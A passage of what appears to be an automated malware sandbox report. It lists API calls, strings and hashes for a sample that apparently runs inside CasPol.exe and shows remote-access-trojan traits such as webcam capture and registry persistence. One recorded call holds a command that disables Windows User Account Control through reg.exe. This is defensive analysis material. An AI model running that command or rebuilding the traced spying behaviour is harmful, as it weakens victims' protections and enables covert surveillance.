                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                                                                  • String ID: `AG
                                                                                                                                                                                                                                  • API String ID: 1958988193-3058481221
                                                                                                                                                                                                                                  • Opcode ID: 4b7d965d3464bb2d060ecaad018a0c75fbc041bdc5d21b9523507d02d46e7123
                                                                                                                                                                                                                                  • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b7d965d3464bb2d060ecaad018a0c75fbc041bdc5d21b9523507d02d46e7123
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                                                                                                  Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                                                                  • String ID: 0$MsgWindowClass
                                                                                                                                                                                                                                  • API String ID: 2877667751-2410386613
                                                                                                                                                                                                                                  • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                                                                                                  • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                                                                                                                                  Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                                                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  • API String ID: 2922976086-4183131282
                                                                                                                                                                                                                                  • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                  • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                                                                                                                                  Function 04574B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,04574AEA,?,?,04574A8A,?,04582238,0000000C,04574BBD,00000000,00000000), ref: 04574B59
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 04574B6C
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,04574AEA,?,?,04574A8A,?,04582238,0000000C,04574BBD,00000000,00000000,00000001,04572082), ref: 04574B8F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: 1b537995a4c616640414bf2cba446bd44f06d81ebadf12740b7598c98e01f00f
                                                                                                                                                                                                                                  • Instruction ID: a0822a8217a9698ba5c585db3661360586681567834f35602d364a1ba7e62024
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b537995a4c616640414bf2cba446bd44f06d81ebadf12740b7598c98e01f00f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F03C31A00218ABDB11AFA0FC09F9DBFB9FF45751F004178E809A6150DB79AD49EA90
                                                                                                                                                                                                                                  Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                  • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                                                                                                                                  Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                                                  • String ID: pth_unenc$BG
                                                                                                                                                                                                                                  • API String ID: 1818849710-2233081382
                                                                                                                                                                                                                                  • Opcode ID: 87978d4cbb2bd718b7edbb20148c75b812c3e6c6230698840110c73191dabcb0
                                                                                                                                                                                                                                  • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87978d4cbb2bd718b7edbb20148c75b812c3e6c6230698840110c73191dabcb0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                                                                                                                  Function 10014C41 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C61
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10014C74
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C97
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: 873052653539bccc7e1ea00198fc24244249cfb0554d021f73da006c918f9e5c
                                                                                                                                                                                                                                  • Instruction ID: b1000cfdb8d1dca94868537454e3314dce1bc17294372af6874ad0ad3cb996e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873052653539bccc7e1ea00198fc24244249cfb0554d021f73da006c918f9e5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF06230901228BBEB41DF90DC48FAEBFB8EF15355F514168F909A6160CF309E92DB90
                                                                                                                                                                                                                                  Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(000002D0), ref: 00404AF9
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                                                                  • String ID: KeepAlive | Disabled
                                                                                                                                                                                                                                  • API String ID: 2993684571-305739064
                                                                                                                                                                                                                                  • Opcode ID: be5f9c6fe4c4c3ab2425d129c1f16fb8e343b85419f062c206cfa9b62e194523
                                                                                                                                                                                                                                  • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be5f9c6fe4c4c3ab2425d129c1f16fb8e343b85419f062c206cfa9b62e194523
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                                                                                                                                                  Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                                                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                                                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                                                                  • API String ID: 3024135584-2418719853
                                                                                                                                                                                                                                  • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                                                                                                  • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                                                                                                                  Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: GetCursorInfo$User32.dll$`Wu
                                                                                                                                                                                                                                  • API String ID: 1646373207-4024354691
                                                                                                                                                                                                                                  • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                                                                                                                  • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                                                                                                                                                  Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 092d045fd4dfbc3abfb12b6361b7e91f54830b77947eddd119647d88fc19d888
                                                                                                                                                                                                                                  • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 092d045fd4dfbc3abfb12b6361b7e91f54830b77947eddd119647d88fc19d888
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                                                                                                                                                  Function 00403DE7 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 135sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                                                                                                                    • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prologSleep
                                                                                                                                                                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                                                                                                  • API String ID: 3469354165-3547787478
                                                                                                                                                                                                                                  • Opcode ID: 981ea8ca016640cdab2a99906ecccc1e83bd7551dbecf4d4b3637572d7ba3526
                                                                                                                                                                                                                                  • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 981ea8ca016640cdab2a99906ecccc1e83bd7551dbecf4d4b3637572d7ba3526
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                                                                                                                                  Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                                                                                    • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                                                                                                                                                    • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                                                                                                                                                                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2180151492-0
                                                                                                                                                                                                                                  • Opcode ID: 7a7abbd5acfae4032e6c071a74bccd3e65725e2c330d94540fcc8033759fe7e8
                                                                                                                                                                                                                                  • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a7abbd5acfae4032e6c071a74bccd3e65725e2c330d94540fcc8033759fe7e8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                                                                                                                                                  Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                  • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
